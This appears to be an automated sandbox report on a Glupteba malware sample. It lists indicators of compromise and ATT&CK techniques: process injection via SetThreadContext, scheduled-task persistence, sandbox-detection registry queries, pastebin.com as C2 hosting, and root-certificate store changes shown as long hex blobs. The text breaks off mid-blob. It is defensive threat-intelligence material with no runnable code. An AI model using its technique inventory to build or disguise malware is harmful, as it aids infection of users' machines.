glupteba | b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

13evA9wal9gieIRSHOIx7DVn.exe13evA9wal9gieIRSHOIx7DVn.exe

description	ioc	process
File opened (read-only)	\??\F:	13evA9wal9gieIRSHOIx7DVn.exe
File opened (read-only)	\??\D:	13evA9wal9gieIRSHOIx7DVn.exe
File opened (read-only)	\??\F:	13evA9wal9gieIRSHOIx7DVn.exe
File opened (read-only)	\??\D:	13evA9wal9gieIRSHOIx7DVn.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

1 pastebin.com
2 pastebin.com

flow	ioc
1	pastebin.com
2	pastebin.com

Drops file in System32 directory 6 IoCs

Processes:

powershell.exeNS6rGAGIv4P400sLxCOtLJyY.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy	NS6rGAGIv4P400sLxCOtLJyY.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	NS6rGAGIv4P400sLxCOtLJyY.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	NS6rGAGIv4P400sLxCOtLJyY.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	NS6rGAGIv4P400sLxCOtLJyY.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exeUniversalInstaller.execmd.exe

description	pid	process	target process
PID 320 set thread context of 4728	320	b1bf0f6717341cb605ebf48e85805282b77e5a3d610f211b90e4ec726b448331.exe	AddInProcess32.exe
PID 2096 set thread context of 2200	2096	UniversalInstaller.exe	cmd.exe
PID 2200 set thread context of 3204	2200	cmd.exe	MSBuild.exe

Drops file in Windows directory 2 IoCs

Processes:

schtasks.execmd.exe

description ioc process

File created C:\Windows\Tasks\bWycNackLSywaqkmgR.job schtasks.exe
File created C:\Windows\Tasks\GS_Debug.job cmd.exe
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

5060 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\bWycNackLSywaqkmgR.job	schtasks.exe
File created	C:\Windows\Tasks\GS_Debug.job	cmd.exe

pid	process
5060	sc.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

u3p4.1.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3p4.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3p4.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u3p4.1.exe

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2964	schtasks.exe
4368	schtasks.exe
4508	schtasks.exe
3476	schtasks.exe
440	schtasks.exe
3640	schtasks.exe
1932	schtasks.exe
1340	schtasks.exe
2792	schtasks.exe
2984	schtasks.exe
4372	schtasks.exe
752	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

1Y5p0DBnCJqnlXI8OmDX7JHB.exepowershell.exepowershell.exebRl4jNgMLsMxBemHk5tIPc28.exepowershell.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	bRl4jNgMLsMxBemHk5tIPc28.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time"	1Y5p0DBnCJqnlXI8OmDX7JHB.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

13evA9wal9gieIRSHOIx7DVn.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	13evA9wal9gieIRSHOIx7DVn.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	13evA9wal9gieIRSHOIx7DVn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4	13evA9wal9gieIRSHOIx7DVn.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b250417